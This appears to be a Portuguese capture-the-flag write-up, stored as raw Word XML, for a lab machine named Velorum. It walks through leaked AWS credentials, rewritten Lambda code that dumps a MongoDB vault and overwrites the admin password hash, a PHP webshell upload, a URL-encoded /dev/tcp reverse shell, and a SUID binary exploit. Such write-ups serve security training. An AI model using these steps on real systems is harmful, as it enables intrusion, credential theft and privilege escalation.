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bh5m1x3iafoe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rgtvdnr7ybe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à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Velorum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xnabgllw7hgx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Iniciamos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enumeração das portas da máquina utilizando o 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11400"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="9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fomos redirecionados para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velorum.hc.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Adicionamos o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velorum.hc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resolução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localmente.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24100"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="9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acessar a aplicação web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90800"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="9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momento, foi possível realizar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fuzzing/brute force de subdomínios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 para identificar novos endpoints e serviços expostos.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http://velorum.hc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FUZZ.velorum.hc'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n0kovo_subdomains.txt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22600"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="9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os subdomínios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cloud, git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vault.</w:t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subdomínio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http://vault.velorum.hc/login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página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login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aplicação.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08613"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="9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6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subdomínio,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http://git.velorum.hc/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que correspondia a uma instância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41913"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="10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subdomínio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visualizar repositórios/diretórios sem autenticação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9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55900"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="10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credentials.json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obter credenciais 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AWS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expostas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repositório.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55900"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="10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25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="10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route.js,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que a aplicação utilizava o endpoint customizado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cloud.velorum.hc,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integrado a funções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AWS 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 que a aplicação funcionava como um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cofre de senhas.</w:t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44800"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="10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mesmo arquivo, a partir da linha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51,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observar que essa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específica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realiza uma chamada para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VaultFunction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retorna os dados renderizados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indicando que a função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acesso direto aos dados confidenciais do cofre.</w:t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21000"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="10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acessar esses dados, foi necessário configurar as credenciais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encontradas no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credentials.json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utilizando o</w:t>
      </w:r>
      <w:hyperlink r:id="rId2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AWS CLI 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77900"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="10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configurar as credenciais, testamos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conexão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endpoint personalizado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confirmando a comunicação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cloud.velorum.hc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conexão foi bem-sucedida, validando o acesso ao ambiente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AWS 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get-caller-identity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25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="10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Avaliamos a existência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VaultFunction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conseguimos recuperar suas informações no ambiente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AWS.</w:t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27300"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="10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dessas informações, foi possível identificar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execução em Node.js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bem como a existência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outros arquivos ZIP armazenados no diretório do S3.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URL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armazenado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estava assinada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(presigned URL)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o acesso temporário ao arquivo.</w:t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"Configuration":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"FunctionName":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"VaultFunction",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"FunctionArn":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"arn:aws:lambda:us-east-1:000000000000:function:VaultFunction",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"Runtime":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"nodejs18.x",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"arn:aws:iam::000000000000:role/lambda-execute-role",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"Handler":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"handler.handler",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1855002,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"Timeout":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"MemorySize":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"LastModified":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"2026-01-07T13:42:21.794766+0000",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"CodeSha256":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"FTugeXGPfBKHh0l+gj6VwEgeIRrP07VSUOhJvqzPUjw=",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"$LATEST",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"TracingConfig":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"PassThrough"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"RevisionId":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"fd3ed6d6-98c2-4af6-a22d-93ccdec305c5",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"Active",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"LastUpdateStatus":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"Successful",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"PackageType":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"Zip",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"Architectures":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"x86_64"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"EphemeralStorage":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"SnapStart":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"ApplyOn":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"OptimizationStatus":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"RuntimeVersionConfig":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"RuntimeVersionArn":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"arn:aws:lambda:us-east-1::runtime:8eeff65f6809a3ce81507fe733fe09b835899b99481ba22fd75b5a7338290ec1"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"LoggingConfig":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"LogFormat":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"LogGroup":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"/aws/lambda/VaultFunction"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"RepositoryType":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"Location":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"http://s3.localhost.localstack.cloud:4566/awslambda-us-east-1-tasks/snapshots/000000000000/VaultFunction-7b535a4b-feb3-432f-9db1-79309acc012c?AWSAccessKeyId=949334387222&amp;Signature=NLTJ3j6BM%2B0ss%2FZl7aMRoHhES0A%3D&amp;Expires=1767796969"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Baixamos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.zip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S3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 nossa máquina local.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007B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"http://cloud.velorum.hc/awslambda-us-east-1-tasks/snapshots/000000000000/VaultFunction-7b535a4b-feb3-432f-9db1-79309acc012c?AWSAccessKeyId=949334387222&amp;Signature=NLTJ3j6BM%2B0ss%2FZl7aMRoHhES0A%3D&amp;Expires=1767796969"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VaultFunction.zip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46100"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="10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descompactamos o arquivo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análise do conteúdo.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VaultFunction.zip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13313"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="11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3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 extraído, foram encontrados os arquivos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handler.js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package.json,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package-lock.json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node_modules.</w:t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Analisando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handler.js,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identificar que ele corresponde a uma função serverless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(AWS Lambda)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responsável por:</w:t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Conecta a um banco de dados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um endereço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IP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Busca todos os documentos da coleção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vault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banco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velorum_vault.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Retorna os dados em formato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(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status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ou um erro (status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require('mongodb');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'mongodb://172.25.0.10:27017';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'velorum_vault';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MongoClient(uri,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useUnifiedTopology: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client.connect();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client.db(dbName);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db.collection('vault');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collection.find({}).toArray();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JSON.stringify(docs),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err.message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console.error("Error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MongoClient:",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modificar a função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Lambda (handler.js)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forma a interagir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obter acesso aos bancos de dados.</w:t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require('mongodb');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'mongodb://172.25.0.10:27017';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'velorum_vault';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MongoClient(uri,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useUnifiedTopology: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client.connect();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client.db(dbName);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db.collection('vault');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collection.find({}).toArray();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JSON.stringify(docs),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err.message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console.error("Error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MongoClient:",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as modificações, compactamos novamente os arquivos em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reutilização no ambiente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Lambda.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mongo-full-enum.zip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node_modules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11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criada uma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chamada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MongoFullEnum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configurada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Node.js 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utilizando código a partir de um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timeout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15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segundos e 256 MB de memória, executada em um ambiente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local/simulado.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000E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create-function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--function-name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MongoFullEnum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--runtime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nodejs18.x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arn:aws:iam::000000000000:role/lambda-execute-role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--zip-file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fileb://mongo-full-enum.zip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--memory-size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78300"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="11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executamos a função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MongoFullEnum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salvamos o resultado da execução no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output.json.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000F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--function-name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MongoFullEnum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11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fim,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analisamos os dados extraídos do MongoDB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obtidos a partir da execução da função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Lambda.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'.body'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'|keys'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36700"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="8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o banco de dados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velorum_app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continha credenciais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 armazenadas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'.body'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'velorum_app'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8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obtivemos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admin@velorum.hc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associada:</w:t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$2y$12$utfeLO161spkah9qFcGqvuGOfqZRJ6J5SmDpdVJrE6a2bE73JCbbS.</w:t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entanto, não foi possível quebrar essa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não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quebrar a hash existente,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geramos uma nova hash bcrypt para uma senha conhecida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Em vez de tentar quebrar a hash original,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alteramos o registro no banco de dados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substituir a senha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 controlado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autenticação com uma credencial conhecida.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001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Criamos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 bcrypt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uma senha conhecida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substituição no banco de dados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b'P@$$word123!'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bcrypt.hashpw(pw,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bcrypt.gensalt(12))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print(h.decode())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562100"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="8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Alteramos novamente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handler.js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que a função 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conectasse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atualizasse a hash da senha do usuário administrador.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000119">
      <w:pPr>
        <w:spacing w:after="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updatePassword.js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velorum_app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require('mongodb');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'mongodb://172.25.0.10:27017';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MongoClient(uri,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useUnifiedTopology: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client.connect();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velorum_app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client.db('velorum_app');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db.collection('users');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usersCollection.updateOne(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'admin@velorum.hc'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'$2b$12$sXRGnxCaTQ.jMMhqSPT9tuAXrY5dySCeZCHQdMvRxeiFmga9vwpPa'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(result.matchedCount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admin@velorum.hc'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(result.modifiedCount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matchedCount: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result.matchedCount,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modifiedCount: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result.modifiedCount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successfully',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matchedCount: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result.matchedCount,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modifiedCount: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result.modifiedCount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err.message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client.close().catch(()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compactamos novamente os arquivos em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.zip.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000163">
      <w:pPr>
        <w:spacing w:after="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mongo-change-admin-pass.zip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node_modules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82900"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="8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criada uma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 Lambda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chamada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ChangePass,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utilizada para alterar a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executada em um ambiente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create-function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--function-name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--runtime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nodejs18.x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arn:aws:iam::000000000000:role/lambda-execute-role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handler.handler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--zip-file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fileb://mongo-change-admin-pass.zip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--timeout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--memory-size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21100"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="8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chamamos a função para prosseguir com a exploração.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000017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--function-name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--endpoint-url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http://cloud.velorum.hc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60763"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="8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alterar a senha do usuário administrador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sucesso.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001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usuário e a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autenticar na aplicação web principal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admin:P@$$word123!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75313"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="9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3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9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Analisando a aplicação, foi identificada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funcionalidade de upload de arquivos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o envio de arquivos para o sistema.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001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13000"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="9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Interceptando esse endpoint com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verificar que o endpoint aceita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upload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arquivos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.php.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realizar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execução de comandos no servidor por meio da aplicação web.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001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38400"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="9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25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="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acessamos o arquivo enviado por meio do upload.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03700"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"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foi possível executar comandos no sistema por meio do parâmetro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0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webshell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enviada.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001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7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9h7w5e15p1j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h7h2f84ly3eo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já havia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execução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comandos no sistema, foi possível iniciar uma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obtendo acesso remoto interativo à máquina.</w:t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url-encode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=%2Fbin%2Fbash%20-c%20%27sh%20-i%20%3E%26%20%2Fdev%2Ftcp%2F%3Cmachine-ip%3E%2F443%200%3E%261%27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76400"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="7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Recebemos a conexão com sucesso, confirmando o controle da aplicação.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25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="7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obter a reverse shell, foi realizado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upgrade para uma shell TTY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interação completa com o terminal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suporte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atalhos, controle de processos e comandos interativos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B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65300"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="7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usuário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89000"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="7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ay7rslyuh7iu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find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listar todos os binários do sistema que possuem o bit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 configurado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identificar possíveis vetores de elevação de privilégios.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001B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-4000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2&gt;/dev/null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085000"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="7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76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binário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/usr/bin/vaultauth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bit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configurado, indicando que ele é executado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privilégios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independentemente do usuário que o executa.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001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transferimos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/usr/bin/vaultauth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análise local, com o objetivo de avaliar seu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comportamento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identificar possíveis falhas exploráveis.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001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foi transferido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netcat (nc)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análise local.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001C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enviar o arquivo, utilizamos o comando:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001C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/usr/bin/vaultauth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47700"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="8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receber o arquivo utilizamos:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001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-lvnp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8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analisamos o binário utilizando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Ghidra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entender sua lógica interna e avançar na exploração.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001D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84400"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="6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 binário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Ghidra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FUN_00101289,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responsável por realizar uma operação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(usada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criptografar/descriptografar dados).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partir da análise do código, foi possível extrair a chave utilizada, identificada como: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2233445566778899aabb.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001D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25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="6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89200"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="6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Analisando outras funções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binário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FUN_0010130c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executa as seguintes ações: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Solicita um token ao usuário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Aplica uma operação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XOR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uma chave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hardcoded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Compara o resultado com um valor esperado armazenado em memória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Caso a validação seja bem-sucedida, executa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grep em /etc/passwd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(SUID)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46638"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="6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42063"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="6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0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binário validava a entrada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comparando o valor fornecido pelo usuário com o conteúdo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DAT_00104020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Esse valor estava ofuscado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XOR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era decodificado em tempo de execução. O token utilizado na verificação correspondia ao valor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6f587c040e00b1f09bee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76400"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="6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 chave de criptografia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já havia sido identificada anteriormente, bastou descriptografar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usuário para recuperar o valor esperado. Abaixo foi utilizado um script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descriptografar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os dados aplicando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a chave previamente encontrada.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001E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bytes.fromhex("2233445566778899aabb")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cifrado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bytes.fromhex("6f587c040e00b1f09bee")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bytes([cifrado[i]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^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chave[i]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range(10)])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print(token.decode())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token obtido, foi possível executar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binário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privilégios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binário chamava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grep como root sem qualquer sanitização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entrada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usuário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que permitiu explorar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executar comandos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arbitrários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privilégios elevados.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001E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648325" cy="2181225"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="6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1812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disso, executamos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binário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explorando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chamar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que permitiu obter uma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shell privilegiada como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/usr/bin/vaultauth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Mk8Qhw9i1U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/etc/passwd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20800"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="7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1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15025" cy="1123950"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="7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1239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headerReference r:id="rId60" w:type="default"/>
      <w:headerReference r:id="rId61" w:type="first"/>
      <w:headerReference r:id="rId62" w:type="even"/>
      <w:footerReference r:id="rId63" w:type="default"/>
      <w:footerReference r:id="rId64" w:type="first"/>
      <w:footerReference r:id="rId6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rPr>
        <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
      </w:rPr>
    </w:pPr>
    <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.ngz9ss5weo0m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86" name="image18.jpg"/>
          <a:graphic>
            <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
              <pic:pic>
                <pic:nvPicPr>
                  <pic:cNvPr id="0" name="image18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FF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82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6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Velorum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6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13.png"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image3.png"/><Relationship Id="rId44" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image12.png"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image4.png"/><Relationship Id="rId46" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image16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9.png"/><Relationship Id="rId47" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image14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79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3.png"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image33.png"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image24.png"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image20.png"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image22.png"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image17.png"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image28.png"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image34.png"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image31.png"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image36.png"/><Relationship Id="rId62" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header3.xml"/><Relationship Id="rId61" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header2.xml"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image43.png"/><Relationship Id="rId64" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer2.xml"/><Relationship Id="rId63" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer1.xml"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image50.png"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://aws.amazon.com/pt/cli/" TargetMode="External"/><Relationship Id="rId65" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer3.xml"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image39.png"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image47.png"/><Relationship Id="rId60" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header1.xml"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image48.png"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image46.png"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image49.png"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image45.png"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image53.png"/><Relationship Id="rId51" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image8.png"/><Relationship Id="rId50" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image25.png"/><Relationship Id="rId53" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image2.png"/><Relationship Id="rId52" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image11.png"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image44.png"/><Relationship Id="rId55" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image6.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image35.png"/><Relationship Id="rId54" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image29.png"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image41.png"/><Relationship Id="rId57" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image15.png"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image32.png"/><Relationship Id="rId56" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image1.png"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image40.png"/><Relationship Id="rId59" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image27.png"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image54.png"/><Relationship Id="rId58" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image7.png"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image51.png"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image37.png"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image42.png"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image5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jpg"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image2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3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xGrVSta+/He1l009Aih0HcYpig==">CgMxLjAyDmguYmg1bTF4M2lhZm9lMg5oLnFyZ3R2ZG5yN3liZTIOaC54bmFiZ2xsdzdoZ3gyDmguOWg3dzVlMTVwMWozMg5oLmg3aDJmODRseTNlbzIOaC5heTdyc2x5dWg3aXUyDmgubmd6OXNzNXdlbzBtOAByITEyVERGVDVnb1NKLUNESHZ5RmVucTRYN2RfS3FBaFR4Zg==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